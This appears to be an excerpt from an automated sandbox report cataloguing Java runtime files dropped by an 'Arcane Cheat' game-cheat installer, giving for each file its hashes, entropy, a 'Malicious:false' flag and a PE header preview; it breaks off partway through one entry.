                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.477340414037824
                                Encrypted:false
                                SSDEEP:384:Gps45cnk6LlmSHhV8i+ceek4SzS+nYPLr7wd:Gpsnn5AS/8jZek7C7wd
                                MD5:4DE6BFE6EA98BC42A5358ED8307107B2
                                SHA1:8F687E60784FD9046A361DC1DC85D43051CBD577
                                SHA-256:7C07D167AA4A23AB64A205301663C87E578FF6B31985DF8B51AF80CA6999176F
                                SHA-512:8091AADEACAD1DAC5191EBB996D1E4BE25A19C10A4E76F79AB7EA2A592711FD39AAD7E89D7DEE09385296AA7A649AABFA7C325C4A627AFE1C009C906709EDB5A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`............@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\klist.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.477747126356611
                                Encrypted:false
                                SSDEEP:384:GpsJ5cn66FmSHhV8Teeek4SzSgnYPLr7mpB:GpsUngS/8TDekdC7yB
                                MD5:CA17B8CBD623477C5D1D334B79890225
                                SHA1:2BFC372A28EDE40093286CDA45003951A2CE424F
                                SHA-256:A7AC47AC8518E2D53575E12521B3A766A5E2EE4133C6C6AB9AE1C3C6777F5E77
                                SHA-512:D9DDF3E67B9A4E0197D271243623D4DF8A26A35EC2F5195AB316E910E133BA09C70F6D28E7CA69184E4ABABCF063C014D7A6E6EA48F82382B316864A945175C5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`....... ....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\ktab.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.476844183458217
                                Encrypted:false
                                SSDEEP:384:Gpsw5cnL6U0mSHhV89+ee84SzSFnYPLr7KTdK:Gps/nHpS/89je80C7KQ
                                MD5:B4AD335E868693F009B7644E2ED555C1
                                SHA1:ECCB9711CF78BCD5BD78231A838B1852764B301C
                                SHA-256:CCA46A54A1A9CE78F7FFC49D195C4AB970AD540B5FCB2B6D9BF57EEDF38EC28D
                                SHA-512:04A4670345B47C5B256220A85FFC68A1DD6DFE8D44838A4C634EB0EBC469EFC307B0BCF838AA1244634A315F365518B1633586B872C6D459EE80374D14234CA4
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`......{.....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\lcms.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):185920
                                Entropy (8bit):6.517453559791758
                                Encrypted:false
                                SSDEEP:3072:pmxoFzYbnERrNyf0VCyqp2pswAG8wJfV1cnrQKUCc9rBTq/bKQcUMZ:koFJcQCyuZG8wdKcLgbDcU6
                                MD5:D4246AF96E1FFA5E63C55E6F0A63ED82
                                SHA1:30F319CEBD7BCCCFC3637231D07F45BD5A79B03E
                                SHA-256:84576AAC88D08E864645415D8A81F4B8F04C881B7624973C952BA6BCB94F4C8C
                                SHA-512:92EDFE62BE5BDDC47EC51B01F8FE71C69691423ABECBB358A972766ACCDC8F9365C064FD0A7833C8853EDD5DED51791A7662584DB5F54BE3586AC2787160FA6A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......AE.m.$z>.$z>.$z>.\.>.$z>...>.$z>...>.$z>...>.$z>.${>T$z>...>"$z>...>.$z>...>.$z>...>.$z>Rich.$z>........................PE..L...pPjW...........!.................%.......0.....o......................................@..........................P..h...LK..d.......................@.......$... 1...............................I..@............0...............................text............................... ..`.rdata..H#...0...$... ..............@..@.data....h...`...\...D..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\management.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):33344
                                Entropy (8bit):6.5580840927675945
                                Encrypted:false
                                SSDEEP:768:5TuVpsEkV3/azbYJHf2ZdCwhxKdv0tCFC7dRb:5YQV3/az8x2HCSScC4dRb
                                MD5:EFF31A13A4A5D3E9A5BD36E7349D028B
                                SHA1:8E47BE8C1CE4DFD73B7041679E96EA4A17DDB4C0
                                SHA-256:307B816892FDD9BAD9E28953E1BBB4BCE35C8F8CA783C369D7EB52A22BCC4229
                                SHA-512:72148C757624868D3866C40B31149CCA171737D82ADBCDF2C8FB03A9D8F3C1CEA2B2FC5137DD11DAAD2328D3AF8FAE43568DCCD843664BC43323F9357B67B6A0
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\j.29.29.29w..9.29...9.29...9.29..9.29...9.29.39..29...9..29...9.29...9.29...9.29Rich.29........PE..L...pPjW...........!.....,...>......H6.......@.....o................................T.....@..........................T.......K.......................j..@...........pA..............................XJ..@............@..P............................text...^+.......,.................. ..`.rdata...-...@.......0..............@..@.data...@....p.......^..............@....rsrc................`..............@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\mlib_image.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):574528
                                Entropy (8bit):6.508068830472597
                                Encrypted:false
                                SSDEEP:12288:NtKMEr1LBBgPcvhwhtRtL+tKJZetu4zxLukaMevlOjPMat4+8NMutQaLqqiINw3X:NtKMEr1VBgPcvhwhtRtL+tkZezxLuQeS
                                MD5:5E1B7D0ACCB4275DEAB6312AA246CB3E
                                SHA1:488A5CB9D9C0CF27824DF32B9B76D4F67F6FB485
                                SHA-256:9FC49B3F6FD11A2B2B92748C24F21721D1011B1920D092E38AF4021102125543
                                SHA-512:5A875DD4731E862F753EBB987593DC61D39DD3D3D13CDED284DE27DD09AFA946FA96824AC194EC0DD45AA2CE0D56637A5522F49F28F3C89B7F5248D389B1B62E
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y...8i.8i.8i.@..8i....8i.8h.8i....8i....8i.....8i....8i....8i....8i.Rich.8i.........PE..L...pPjW...........!...............................o.....................................@......................... ..."......<.......................@...........................................p...@............................................text............................... ..`.rdata..B...........................@..@.data...,...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcp120.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):455328
                                Entropy (8bit):6.698367093574994
                                Encrypted:false
                                SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                MD5:FD5CABBE52272BD76007B68186EBAF00
                                SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcr100.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):773968
                                Entropy (8bit):6.901569696995594
                                Encrypted:false
                                SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                MD5:BF38660A9125935658CFA3E53FDC7D65
                                SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L..."._M.........."!.........................0.....x................................u.....@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcr120.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):970912
                                Entropy (8bit):6.9649735952029515
                                Encrypted:false
                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                MD5:034CCADC1C073E4216E9466B720F9849
                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\net.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):79936
                                Entropy (8bit):6.675027571633986
                                Encrypted:false
                                SSDEEP:1536:ygRdVzzmTj2iu+wk5eQjBE55W+hYRwZZ3GFjJJ5n5WF:yIfmHsM5j6VqJJ55WF
                                MD5:691B937A898271EE2CFFAB20518B310B
                                SHA1:ABEDFCD32C3022326BC593AB392DEA433FCF667C
                                SHA-256:2F5F1199D277850A009458EDB5202688C26DD993F68FE86CA1B946DC74A36D61
                                SHA-512:1C09F4E35A75B336170F64B5C7254A51461DC1997B5862B62208063C6CF84A7CB2D66A67E947CBBF27E1CF34CCD68BA4E91C71C236104070EF3BEB85570213EC
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.._e.}.e.}.e.}.~'..d.}.~'..g.}.....f.}.~'..c.}.e.|..}.l...b.}.l...d.}.~'..D.}.~'..d.}.~'..d.}.~'..d.}.Riche.}.................PE..L...pPjW...........!.........l.....................o.........................`......-.....@.............................1............0............... ..@....@...................................... ...@...................l...`....................text............................... ..`.rdata...L.......N..................@..@.data........ ......................@....rsrc........0......................@..@.reloc..*....@......................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\nio.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):51264
                                Entropy (8bit):6.565433654691718
                                Encrypted:false
                                SSDEEP:768:a+BEJER/xSW/EoB8VBQZbKYawLysHFhIAqQbQMD8YpwQ+Qi4v8qUYVC7R:a+BEJERvQGbKnwusjIAq08YDi4UqUYoR
                                MD5:95EDB3CB2E2333C146A4DD489CE67CBD
                                SHA1:79013586A6E65E2E1F80E5CAF9E2AA15B7363F9A
                                SHA-256:96CF590BDDFD90086476E012D9F48A9A696EFC054852EF626B43D6D62E72AF31
                                SHA-512:AB671F1BCE915D748EE49518CC2A666A2715B329CAB4AB8F6B9A975C99C146BB095F7A4284CD2AAF4A5B4FCF4F939F54853AF3B3ACC4205F89ED2BA8A33BB553
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J!...@..@..@...@..@...u..@...B..@..@..@..8M..@...t..@...E..@...D..@...C..@.Rich.@.........PE..L...pPjW...........!.....V...Z......9_.......p.....o................................X.....@..............................+..L|..........................@.......t....r...............................{..@............p...............................text...TT.......V.................. ..`.rdata...F...p...H...Z..............@..@.data...(...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\npt.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):17472
                                Entropy (8bit):6.403594687791098
                                Encrypted:false
                                SSDEEP:192:A3PK394shTLHzW8KMw3X+PVR6y/FNdoEUtnYe+PjPriT0fwoBpp6Z:BThTrzPPQOPV5NNdoEwnYPLr7xc
                                MD5:94CAADA66F6316A9415A025C68388A18
                                SHA1:57544E446B2B0CFBA0732F1F46522354F94B7908
                                SHA-256:D1C4FB91296D643AEE6AB9CD66CC70ACBE2667AD572D969A06FFEAA2A8859FAF
                                SHA-512:AC29E7C722A266DCB633953EF2A7E33DF02059AC7876FF94828464B5B74B5BC321C5D2D2851F3CBBFE1328D18F3CD9A49E5EFFE7E4E8AC2BEB3A0E4AAA53AD87
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w....@..w..O9K..w....O..w...w...w....M..w....x..w....y..w....H..w....I..w....N..w..Rich.w..........PE..L...qPjW...........!................)........0.....o.........................p......w.....@..........................7.._....3..<....P...............,..@....`.......0...............................2..@............0...............................text...>........................... ..`.rdata..O....0......................@..@.data...X....@......."..............@....rsrc........P.......$..............@..@.reloc.......`.......(..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\orbd.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.380289288441742
                                Encrypted:false
                                SSDEEP:384:GpsCgvnvId6YmSHhV85AeencGtnYPLr7Vz:GpsDngGS/851ebC7Vz
                                MD5:7DA6AA3CC4763C6F9C20B43E6C9A9547
                                SHA1:3F28CF8E6AAD199DCC621F2A2C8AD50126813B05
                                SHA-256:F7375AD07F0BE6FD75E822A9ECFF5ACA073DB03B95894C05C7657BEC7AF59AF4
                                SHA-512:7948EAA11B4026F9975B6CC4225A4C0B617341299364196F3825EEF4484A6EEB529319BF4F6D19436689083C36BF1F6B9880574764612FC900C8CC1D73EED1BB
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................z........ ....@..........................`......1.....@..................................#..P....@..H............(..@....P....... ..............................h"..@............ ...............................text............................... ..`.rdata..*.... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......&..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\pack200.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.4779230305378315
                                Encrypted:false
                                SSDEEP:384:Gpsk5Bn46zmSHhV8yYAeeU4Sz5uwnYPLr73ki:GpsungS/8yY1eUuwC79
                                MD5:E9AA62B1696145A08D223E7190785E25
                                SHA1:A9A0CB22A28A3843CF6CCBC9578B1438F0A7B500
                                SHA-256:EA9DF3432EF31B6864112AF1CEC94E6BE33B92A9030369B9F99225113BCA6EF8
                                SHA-512:516FA102922980DF592DD08A840DA9073B6568F5E52847968C59995F2BD067AC6D2668D0272AE017D0C71AF627766A8676AE1EB1BC520B76F1F9C5CEEB4BA840
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......#....@.................................D#..P....@..T............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...T....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\is-1RSEV.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):773968
                                Entropy (8bit):6.901569696995594
                                Encrypted:false
                                SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                MD5:BF38660A9125935658CFA3E53FDC7D65
                                SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L..."._M.........."!.........................0.....x................................u.....@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\is-OVE01.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):172096
                                Entropy (8bit):6.3747906238754855
                                Encrypted:false
                                SSDEEP:3072:1WkHL+UE3r2l5p2WqjgFWcWpPa6QoCzOb/UcODMM4cBqg8UyJNd5uGZzfYtRD+Em:YdNq5YkFuPYzOb/UcODMM4cBqg8UyJNR
                                MD5:FB658E2F5E185FE5762B169A388BA0BD
                                SHA1:386235AB2F7AD35E82CD9AC97E9B56E1E308BC90
                                SHA-256:A91E68C76A90A02D9EDF75E5141C248B3AA5DD612E37883D27065D78A782AF20
                                SHA-512:B0EAB6F2572552298CD221AF9E71CA7C02375D92E14F7EBD783F5DC9247964F72E658DBFC4273BD3C36DF57199171263F1A4969F133823965448C552BB514EEC
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-n.C=.C=.C=...=..C=a..=..C=...=..C=...=..C=.B=..C=...=..C=...=.C=...=.C=...=.C=...=.C=...=.C=Rich.C=........................PE..L...rPjW...........!.....J...@.......-.......`.....o......................................@.............................A............ ...h..............@.......h....c..................................@............`..H............................text....H.......J.................. ..`.rdata..!....`.......N..............@..@.data...X!..........................@....rsrc....h... ...j..................@..@.reloc...".......$...d..............@..B................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\msvcr100.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):773968
                                Entropy (8bit):6.901569696995594
                                Encrypted:false
                                SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                MD5:BF38660A9125935658CFA3E53FDC7D65
                                SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L..."._M.........."!.........................0.....x................................u.....@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\npjp2.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):172096
                                Entropy (8bit):6.3747906238754855
                                Encrypted:false
                                SSDEEP:3072:1WkHL+UE3r2l5p2WqjgFWcWpPa6QoCzOb/UcODMM4cBqg8UyJNd5uGZzfYtRD+Em:YdNq5YkFuPYzOb/UcODMM4cBqg8UyJNR
                                MD5:FB658E2F5E185FE5762B169A388BA0BD
                                SHA1:386235AB2F7AD35E82CD9AC97E9B56E1E308BC90
                                SHA-256:A91E68C76A90A02D9EDF75E5141C248B3AA5DD612E37883D27065D78A782AF20
                                SHA-512:B0EAB6F2572552298CD221AF9E71CA7C02375D92E14F7EBD783F5DC9247964F72E658DBFC4273BD3C36DF57199171263F1A4969F133823965448C552BB514EEC
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-n.C=.C=.C=...=..C=a..=..C=...=..C=...=..C=.B=..C=...=..C=...=.C=...=.C=...=.C=...=.C=...=.C=Rich.C=........................PE..L...rPjW...........!.....J...@.......-.......`.....o......................................@.............................A............ ...h..............@.......h....c..................................@............`..H............................text....H.......J.................. ..`.rdata..!....`.......N..............@..@.data...X!..........................@....rsrc....h... ...j..................@..@.reloc...".......$...d..............@..B................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\policytool.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.477211573452372
                                Encrypted:false
                                SSDEEP:384:Gps25Bnb61mSHhV8nOeet4SzvBQnYPLr7D8/:Gpson1S/8nTetJSC7+
                                MD5:ED3F3D8E4C382BF8095B9DE217511E29
                                SHA1:CAE91B9228C99DCC88BAC3293822AC158430778C
                                SHA-256:800F41B877AA792A8469C4DBB99838E7A833B586EC41BD81DA81EAA571F7FAC1
                                SHA-512:023855267C6CC6BD5230E7A922310328E8DC0521C041C038C579035C9B1E70EAC168695B56357793505375E0B134FAD040BB284C6B02B3190EE7F6FCAEC33FE9
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`...........@.................................D#..P....@..h............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...h....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_common.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):52800
                                Entropy (8bit):6.433054716020523
                                Encrypted:false
                                SSDEEP:1536:Rk2X5KQaT9nNrmTTY99ccAlGGzGRulFJWpiDO:RkgUhpmA99ccOGGzGRuPJWpgO
                                MD5:6D05EAD2F6B95C4AFFCFB1B27DC0C188
                                SHA1:0D04A67505D006493F252985AC294B534D271EF2
                                SHA-256:6330591A151E565B5EAB2D174DF8E2F6523A8F403E4E8D8C8DC58D0945881F19
                                SHA-512:DBE98FA16162636039853E9A82CADBE4E6D5A4E6E282A3FBBC122229C314C91E7C445FEB83921EBFE024DC09BC6AA76682F903036A2D2BEA363F1D09DD571B10
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q..D5.w.5.w.5.w..J..7.w.5.v...w.8..6.w.8..6.w.8..9.w.8..7.w.H..2.w.H..4.w.8..4.w.H..4.w.Rich5.w.........................PE..L...pPjW...........!...............................o................................/&....@....................................<.......................@...............................................@............................................text.............................. ..`.rdata..X...........................@..@.data...D...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_d3d.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):116288
                                Entropy (8bit):5.7845827860105885
                                Encrypted:false
                                SSDEEP:3072:UbqmeUF67oaebwU3ta+uHMg9glgFvcfgfgzgG4g9XTXDXp+RuXGXlXdY9vXTXvXQ:8qmeUF67ZeUUVjcIA
                                MD5:5AADADF700C7771F208DDA7CE60DE120
                                SHA1:E9CF7E7D1790DC63A58106C416944FD6717363A5
                                SHA-256:89DAC9792C884B70055566564AA12A8626C3AA127A89303730E66ABA3C045F79
